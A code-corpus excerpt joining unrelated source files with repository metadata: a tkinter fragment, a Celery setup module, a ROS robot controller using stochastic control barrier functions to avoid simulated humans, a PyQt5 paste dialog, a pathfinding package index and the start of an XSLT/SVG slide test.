name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()
action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)
win.mainloop() | 3.765625 | 4 |
openarticlegauge/slavedriver.py | CottageLabs/OpenArticleGauge | 1 | 16913 | <reponame>CottageLabs/OpenArticleGauge<filename>openarticlegauge/slavedriver.py
"""
Initialise the Celery instance to be used by the application
This is largely just boiler plate, and we could probably look at coming back to it and cleaning it
up a bit in the future.
"""
from __future__ import absolute_import
from celery import Celery
celery = Celery()
from openarticlegauge import celeryconfig
celery.config_from_object(celeryconfig)
# Optional configuration, see the application user guide.
celery.conf.update(
CELERY_TASK_RESULT_EXPIRES=3600,
)
if __name__ == '__main__':
celery.start()
| 1.6875 | 2 |
cbf_ros/scripts/cbf_controller_sy.py | k1majd/CBF_TB_RRT | 2 | 16914 | #! /usr/bin/env python
# call roscore
# $ roscore
#
# If start in manual
# $ rosrun cbf_ros cbf_controller.py
import rospy
import sys
import argparse
import re
import numpy as np
from scipy.integrate import odeint
from sympy import symbols, Matrix, sin, cos, lambdify, exp, sqrt, log
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import cvxopt as cvxopt
# ROS msg
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Vector3
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetWorldProperties, GetModelState, GetModelStateRequest
# ROS others
import tf
DEBUG = False
def orientation2angular(orientation):
quaternion = ( orientation.x,
orientation.y,
orientation.z,
orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
angular = Vector3(
euler[0],
euler[1],
euler[2]
)
return angular
def cvxopt_solve_qp(P, q, G=None, h=None, A=None, b=None):
P = .5 * (P + P.T) # make sure P is symmetric
args = [cvxopt.matrix(P), cvxopt.matrix(q)]
if G is not None:
args.extend([cvxopt.matrix(G), cvxopt.matrix(h)])
if A is not None:
args.extend([cvxopt.matrix(A), cvxopt.matrix(b)])
cvxopt.solvers.options['show_progress'] = False
cvxopt.solvers.options['maxiters'] = 100
sol = cvxopt.solvers.qp(*args)
if 'optimal' not in sol['status']:
return None
return np.array(sol['x']).reshape((P.shape[1],))
def plottrajs(trajs):
if plotanimation:
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o')
plt.arrow(float(trajs.hsr[j][1]),float(-trajs.hsr[j][0]), float(2*trajs.commands[j][0]*sin(trajs.hsr[j][2])), float(-2*trajs.commands[j][0]*cos(trajs.hsr[j][2])), width = 0.05)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o')
plt.draw()
plt.pause(np.finfo(float).eps)
plt.clf()
plt.ion()
plt.axis([-10,10,-10,10],color ="black")
plt.plot([-1.4,-1.4],[-7,7],color ="black")
plt.plot([1.3,1.3],[-7,-1.5],color ="black")
plt.plot([1.3,1.3],[1.4,7],color ="black")
plt.plot([1.3,7],[1.4,1.4],color ="black")
plt.plot([1.3,7],[-1.5,-1.5],color ="black")
for j in range(len(trajs.hsr)):
plt.axis([-10,10,-10,10])
plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o',markersize=2)
for k in range(len(trajs.actors[j])):
plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o',markersize=2)
plt.draw()
plt.pause(np.finfo(float).eps)
plt.ioff()
fig, axs = plt.subplots(4)
axs[0].set(ylabel = 'velocity input')
# axs[1].set_title('risk')
# axs[2].set_title('min Dist')
axs[1].set(ylabel = 'angular velocity input')
axs[2].set(ylabel = 'risk')
axs[3].set(xlabel = 'time', ylabel = 'min Dist')
for k in range(len(trajs.time)):
axs[0].plot(trajs.time[k], trajs.commands[k][0],color ="green",marker = 'o',markersize=2)
axs[1].plot(trajs.time[k], trajs.commands[k][1],color ="green",marker = 'o',markersize=2)
if trajs.risk[k]<risk:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o',markersize=2)
else:
axs[2].plot(trajs.time[k], trajs.risk[k],color ="red",marker = 'o',markersize=2)
axs[3].plot(trajs.time[k], trajs.minDist[k],color ="green",marker = 'o',markersize=2)
plt.draw()
plt.pause(60)
1
# plt.ioff()
# plt.figure(3)
# for k in range(len(trajs.time)):
# plt.plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o')
# plt.draw()
# 1
class robot(object):
def __init__(self,l):
#Symbolic Variables
# t = symbols('t')
# when robot is bicycle model [x,y,theta], obstacles are linear models [x,y]:
xr1,xr2,xr3,xo1,xo2 = symbols('xr1 xr2 xr3 xo1 xo2')
# v w inputs of robot:
u1,u2 = symbols('u1,u2')
vx,vy = symbols('vx,vy')
# Vector of states and inputs:
self.x_r_s = Matrix([xr1,xr2,xr3])
self.x_o_s = Matrix([xo1,xo2])
self.u_s = Matrix([u1,u2])
self.u_o = Matrix([vx,vy])
self.f = Matrix([0,0,0])
self.g = Matrix([[cos(self.x_r_s[2]), -l*sin(self.x_r_s[2])], [sin(self.x_r_s[2]), l*cos(self.x_r_s[2])], [0, 1]])
self.f_r = self.f+self.g*self.u_s
self.l = l #approximation parameter for bicycle model
self.Real_x_r = lambdify([self.x_r_s], self.x_r_s-Matrix([l*cos(self.x_r_s[2]), l*sin(self.x_r_s[2]), 0]))
# Obstacle SDE, not needed if we want to use Keyvan prediction method
self.f_o = self.u_o
# self.f_o = Matrix([0.1, 0.1])
self.g_o = Matrix([0.1, 0.1])
self.g_o = 0.1*self.u_o
# self.f_o_fun = lambdify([self.x_o_s], self.f_o)
# self.g_o_fun = lambdify([self.x_o_s], self.g_o)
def GoalFuncs(self,GoalCenter,rGoal):
Gset = (self.x_r_s[0]-GoalCenter[0])**2+(self.x_r_s[1]-GoalCenter[1])**2-rGoal
GoalInfo = type('', (), {})()
GoalInfo.set = lambdify([self.x_r_s],Gset)
GoalInfo.Lyap = lambdify([self.x_r_s,self.u_s],Gset.diff(self.x_r_s).T*self.f_r)
return GoalInfo
def UnsafeFuncs(self,gamma,UnsafeRadius): #based on the SDE formulation, needs slight change for regular BF
UnsafeInfo = type('', (), {})()
Uset = (self.x_r_s[0]-self.x_o_s[0])**2+(self.x_r_s[1]-self.x_o_s[1])**2-(UnsafeRadius+self.l)**2
CBF = exp(-gamma*Uset)
CBF_d = CBF.diff(Matrix([self.x_r_s,self.x_o_s]))
CBF_d2 = CBF.diff(self.x_o_s,2)
UnsafeInfo.set = lambdify([self.x_r_s,self.x_o_s], Uset)
UnsafeInfo.CBF = lambdify([self.x_r_s,self.x_o_s], CBF)
UnsafeInfo.ConstCond = lambdify([self.x_r_s,self.x_o_s,self.u_o] , CBF_d.T*Matrix([self.f,self.f_o])+0.5*(self.g_o.T*Matrix([[Matrix(CBF_d2[0,0]),Matrix(CBF_d2[1,0])]])*self.g_o))
UnsafeInfo.multCond = lambdify([self.x_r_s,self.x_o_s,self.u_s], CBF_d.T*Matrix([self.g*self.u_s, Matrix(np.zeros((len(self.x_o_s),1)))]))
return UnsafeInfo
def MapFuncs(self,env_bounds):
MapInfo = type('', (), {})()
MapInfo.set = []
MapInfo.CBF = []
MapInfo.setDer = []
# x_min = getattr(env_bounds, "x_min", undefined)
# x_max = getattr(env_bounds, "x_max", undefined)
# y_min = getattr(env_bounds, "y_min", undefined)
# y_max = getattr(env_bounds, "y_max", undefined)
if hasattr(env_bounds,'x_min'):
Uset = (-self.x_r_s[0]+env_bounds.x_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'x_max'):
Uset = (self.x_r_s[0]-env_bounds.x_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_min'):
Uset = (-self.x_r_s[1]+env_bounds.y_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_max'):
Uset = (self.x_r_s[1]-env_bounds.y_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'f'):
pass #To be filled later
return MapInfo
class CBF_CONTROLLER(object):
def __init__(self,robot,GoalInfo,UnsafeInfo,MapInfo):
# publisher to send vw order to HSR
self.vw_publisher = rospy.Publisher('/hsrb/command_velocity', Twist, queue_size=10)
# subscriber for Gazebo info.
rospy.wait_for_service ('/gazebo/get_model_state')
self.get_model_pro = rospy.ServiceProxy('/gazebo/get_world_properties', GetWorldProperties)
self.get_model_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self.tOdometry_subscriber = rospy.Subscriber('/hsrb/odom_ground_truth', Odometry, self.tOdometry_callback, queue_size=10)
self.tOdometry = Odometry()
self.odometry_subscriber = rospy.Subscriber('/global_pose', PoseStamped, self.odometry_callback, queue_size=10)
self.poseStamped = PoseStamped()
# listener of tf.
self.tfListener = tf.TransformListener()
self.actors = []
trajs = type('', (), {})()
trajs.hsr = []
trajs.actors = []
trajs.commands = []
trajs.time = []
trajs.risk = []
trajs.minDist = []
self.trajs = trajs
self.robot = robot
self.GoalInfo = GoalInfo
self.UnsafeInfo = UnsafeInfo
self.MapInfo = MapInfo
self.flag = 0
self.count = 0 # num of times control_callback is called
def __del__(self):
pass
def tOdometry_callback(self, odometry):
self.odometry = odometry # this odometry's coodination is \map
def odometry_callback(self, poseStamped):
self.poseStamped = poseStamped
def gazebo_pos_transformPose(self, frame_id, gazebo_pose):
gazebo_pose_temp = PoseStamped()
gazebo_pose_temp.header = gazebo_pose.header
gazebo_pose_temp.header.frame_id = 'map'
gazebo_pose_temp.pose = gazebo_pose.pose
while not rospy.is_shutdown():
try:
gazebo_pos_trans = self.tfListener.transformPose(frame_id, gazebo_pose_temp)
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
return gazebo_pos_trans
def controller_loop_callback(self, event):
# this controller loop call back.
self.count += 1
now = rospy.get_rostime()
self.trajs.time.append(now.secs+now.nsecs*pow(10,-9))
if DEBUG:
rospy.loginfo('Current time %i %i', now.secs, now.nsecs)
rospy.loginfo('tOdometry\n %s', self.odometry)
# get human model state from Gazebo
if self.count==1:
model_properties = self.get_model_pro()
for model_name in model_properties.model_names:
if re.search('actor*', model_name) and not model_name in self.actors: # if the model name is actor*, it will catch them.
self.actors.append(model_name)
actors_data = []
for actor in self.actors:
model_actor = GetModelStateRequest()
model_actor.model_name = actor
model_actor = self.get_model_srv(model_actor) # the pose date is based on /map
# actor_base_footprint_pose = self.gazebo_pos_transformPose('base_footprint', model_actor) # trasfer /map->/base_footprint
angular = orientation2angular(model_actor.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
p = model_actor.pose.position
actors_data.append([p.x,p.y, angular.z])
if DEBUG:
rospy.loginfo('%s in timestamp:\n%s', actor, model_actor.header.stamp) # time stamp is here.
rospy.loginfo('%s in base_footprint\nposition:\n%s\nangular:\n%s', actor, actor_base_footprint_pose.pose.position, angular)
self.trajs.actors.append(actors_data)
# get hsr model state from odometry
model_hsr = self.odometry
p = model_hsr.pose.pose.position
angular = orientation2angular(model_hsr.pose.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
x_r = [p.x,p.y,angular.z]
self.trajs.hsr.append(x_r)
# making vw data and publish it.
vel_msg = Twist()
# Compute controller
if abs(p.x)<1.5 and self.flag == 0:
self.flag = 1
env_bounds = type('', (), {})()
env_bounds.x_max = 1.2
env_bounds.x_min = -1.3
self.MapInfo = self.robot.MapFuncs(env_bounds)
GoalCenter = np.array([0, 5.5])
self.GoalInfo = self.robot.GoalFuncs(GoalCenter,rGoal)
u = self.cbf_controller_compute()
vel_msg.linear.x = u[0]
vel_msg.angular.z = u[1]
self.vw_publisher.publish(vel_msg)
self.trajs.commands.append([u[0],u[1]])
if self.count > 1000:
rospy.loginfo('reach counter!!')
rospy.signal_shutdown('reach counter')
elif self.GoalInfo.set(x_r)<0:
rospy.loginfo('reached Goal set!!')
rospy.signal_shutdown('reached Goal set')
def cbf_controller_compute(self):
x_r = np.array(self.trajs.hsr[len(self.trajs.hsr)-1])
x_o = np.array(self.trajs.actors[len(self.trajs.actors)-1])
u_s = self.robot.u_s
if self.count>3:
x_o_pre = np.array(self.trajs.actors[len(self.trajs.actors)-4])
# x_o_2pre = np.array(self.trajs.actors[len(self.trajs.actors)-3])
dt = self.trajs.time[len(self.trajs.time)-1]-self.trajs.time[len(self.trajs.time)-4]
u_o = (x_o[:,0:2]-x_o_pre[:,0:2])/dt
else:
u_o = np.zeros((len(x_o),len(self.robot.u_o)))
Unsafe = self.UnsafeInfo
Goal = self.GoalInfo
Map = self.MapInfo
UnsafeList = []
Dists = np.zeros((len(x_o)))
for j in range(len(x_o)):
Dists[j] = Unsafe.set(x_r, x_o[j][0:2])
if Dists[j]<UnsafeInclude:
UnsafeList.append(j)
ai = 1
if min(Dists)<0:
InUnsafe = 1
else:
InUnsafe = 0
minDist = min(Dists)
minJ = np.where(Dists == minDist)
if findBestCommandAnyway:
#Ax<=b, x = [v, w , b1,bh1 b2, bh2..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+2*j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+2*j] = 1; A[2*j+1,len(u_s)+2*j+1] = -1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+2*len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
# Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,1))
for j in range(len(UnsafeList)):
ff[len(u_s)+2*j] = 65
H[len(u_s)+2*j+1,len(u_s)+2*j+1] = 10000
# ff[len(u_s)+2*j+1] = 50* Unsafe.CBF(x_r, x_o[minJ[0][0]][0:2])
ff[len(u_s)+2*len(UnsafeList):len(u_s)+2*len(UnsafeList)+len(Map.set)] = 20
ff[-1] = np.ceil(self.count/100.0)
else:
#Ax<=b, x = [v, w , b1, b2,..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+j] = 1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
# Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,len(u_s)+len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,1))
ff[len(u_s):len(u_s)+len(UnsafeList)] = 20
ff[len(u_s)+len(UnsafeList):len(u_s)+len(UnsafeList)+len(Map.set)] = 10
ff[-1] = np.ceil(self.count/100.0)
try:
uq = cvxopt_solve_qp(H, ff, A, b)
except ValueError:
uq = [0,0]
rospy.loginfo('Domain Error in cvx')
if uq is None:
uq = [0,0]
rospy.loginfo('infeasible QP')
if findBestCommandAnyway and len(uq[2:len(uq)-2*len(Map.set)-1:2])>0: # If humans are around and findbestcommand active
if InUnsafe:
self.trajs.risk.append(1.0)
else:
r = np.zeros(len(uq[2:len(uq)-2*len(Map.set)-1:2]))
for k in range(len(uq[2:len(uq)-2*len(Map.set)-1:2])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[2*k+2]*T)))
self.trajs.risk.append(max(r))
elif not findBestCommandAnyway and len(uq[2:len(uq)-len(Map.set)-1])>0:
r = np.zeros(len(uq[2:len(uq)-len(Map.set)-1]))
for k in range(len(uq[2:len(uq)-len(Map.set)-1])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[k+2]*T)))
self.trajs.risk.append(max(r))
if max(r)>0.1:
1
elif not findBestCommandAnyway and len(uq) == 2: # feasible solution is not found
self.trajs.risk.append(-risk) # meaning that solution is not found
else: # No human is around
self.trajs.risk.append(0.0)
self.trajs.minDist.append(minDist)
return uq
if __name__ == '__main__':
## Parameters
findBestCommandAnyway = 1 #make this zero if you don't want to do anything if it's riskier than intended
#use 1 if you want to do the best even if there is risk
plotanimation = 0
# Goal info
GoalCenter = np.array([0, 0])
rGoal = np.power(0.5,2)
# Unsafe
UnsafeInclude = 9 # consider obstacle if in radius
UnsafeRadius = 0.5 #radius of unsafe sets/distance from obstacles
# Enviroment Bounds
env_bounds = type('', (), {})()
env_bounds.y_min = -1.2
env_bounds.y_max = 1
# env_bounds.x_max = 1.25
# env_bounds.x_min = -1.35
l = 0.01 #bicycle model approximation parameter
U = np.array([[-0.33,0.33],[-0.3,0.3]])
T = 1 #Lookahead horizon
risk = 0.1 # max risk desired
gamma = 5 # CBF coefficient
u1d = 0 # desired input to save energy!
# Plotting options
plotit = 1
plotlanes = 1
robot = robot(l)
GoalInfo = robot.GoalFuncs(GoalCenter,rGoal)
UnsafeInfo = robot.UnsafeFuncs(gamma,UnsafeRadius)
MapInfo = robot.MapFuncs(env_bounds)
# Process arguments
p = argparse.ArgumentParser(description='CBF controller')
args = p.parse_args(rospy.myargv()[1:])
try:
rospy.init_node('cbf_controller')
cbf_controller = CBF_CONTROLLER(robot,GoalInfo,UnsafeInfo,MapInfo)
control_priod = 0.05 #[sec] we can change controll priod with this parameter.
rospy.Timer(rospy.Duration(control_priod), cbf_controller.controller_loop_callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
plottrajs(cbf_controller.trajs)
| 2.125 | 2 |
src/gui/ui_paste_dialog.py | tonypdmtr/sxtool | 3 | 16915 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
def setupUi(self, PasteDialog):
PasteDialog.setObjectName("PasteDialog")
PasteDialog.resize(403, 205)
self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
self.gridLayout.setContentsMargins(11, 11, 11, 11)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupMain.setObjectName("buttonGroupMain")
self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
self.radioReplaceSelection.setObjectName("radioReplaceSelection")
self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
self.radioAddLines.setChecked(True)
self.radioAddLines.setObjectName("radioAddLines")
self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupReplace.setEnabled(False)
self.buttonGroupReplace.setObjectName("buttonGroupReplace")
self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionOnly.setObjectName("radioSelectionOnly")
self.verticalLayout.addWidget(self.radioSelectionOnly)
self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
self.verticalLayout.addWidget(self.radioSelectionAndReplace)
self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndAdd.setChecked(True)
self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
self.verticalLayout.addWidget(self.radioSelectionAndAdd)
self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupAdd.setEnabled(True)
self.buttonGroupAdd.setObjectName("buttonGroupAdd")
self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
self.radioAfterSelection.setObjectName("radioAfterSelection")
self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
self.radioBeforeSelection.setChecked(True)
self.radioBeforeSelection.setObjectName("radioBeforeSelection")
self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
self.pushOk = QtWidgets.QPushButton(PasteDialog)
self.pushOk.setObjectName("pushOk")
self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
self.pushCancel = QtWidgets.QPushButton(PasteDialog)
self.pushCancel.setObjectName("pushCancel")
self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
self.retranslateUi(PasteDialog)
self.pushOk.clicked.connect(PasteDialog.accept)
self.pushCancel.clicked.connect(PasteDialog.reject)
self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
QtCore.QMetaObject.connectSlotsByName(PasteDialog)
def retranslateUi(self, PasteDialog):
_translate = QtCore.QCoreApplication.translate
PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
self.pushOk.setText(_translate("PasteDialog", "OK"))
self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| 2.0625 | 2 |
app/pathfinding/finder/__init__.py | TheronHa/Spaghetti | 208 | 16916 | __all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
| 1.328125 | 1 |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py | aleasims/Peach | 0 | 16917 | <reponame>aleasims/Peach
#Uche's test from Sun's SVG slide publisher
import os
from Xml.Xslt import test_harness
#From Sun's toolkit
sheet_1_uri = "Xml/Xslt/Borrowed/svgslides.xsl"
sheet_2_uri = "Xml/Xslt/Borrowed/svgslides_custom.xsl"
sheet_3_uri = "Xml/Xslt/Borrowed/slidescript.xsl"
source_1_uri = "Xml/Xslt/Borrowed/slides4svg.xml"
saxon_output = """"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="slides.css" type="text/css"?>
<svg height='768' width='1024' style='pointer-events:visible' xml:space='preserve' onload='initSlides(evt)' xmlns:xlink='http://www.w3.org/2000/xlink/namespace/'>
<script><![CDATA[
var doc = null;
// Called upon presentation loading
function initSlides(evt){
var target = evt.getTarget();
doc = target.getOwnerDocument();
hideAndShow(evt, curSlide, curSlide);
}
function onPrevSlide(evt){
// Process new current slide
var oldCurSlide = curSlide;
curSlide = curSlide - 1;
if(curSlide < 0){
curSlide = slideList.length - 1;
}
hideAndShow(evt, oldCurSlide, curSlide);
}
function onNextSlide(evt){
// Process new current slide
var prevSlide = curSlide;
curSlide = curSlide + 1;
if(curSlide > (slideList.length - 1)){
curSlide = 0;
}
hideAndShow(evt, prevSlide, curSlide);
// alert("onNextSlide");
}
function hideAndShow(evt, hideSlide, showSlide){
// alert("Hiding : " + hideSlide + " and showing : " + showSlide);
// Hide previous current slide and show new
// one.
var hideSlideName = slideList[hideSlide];
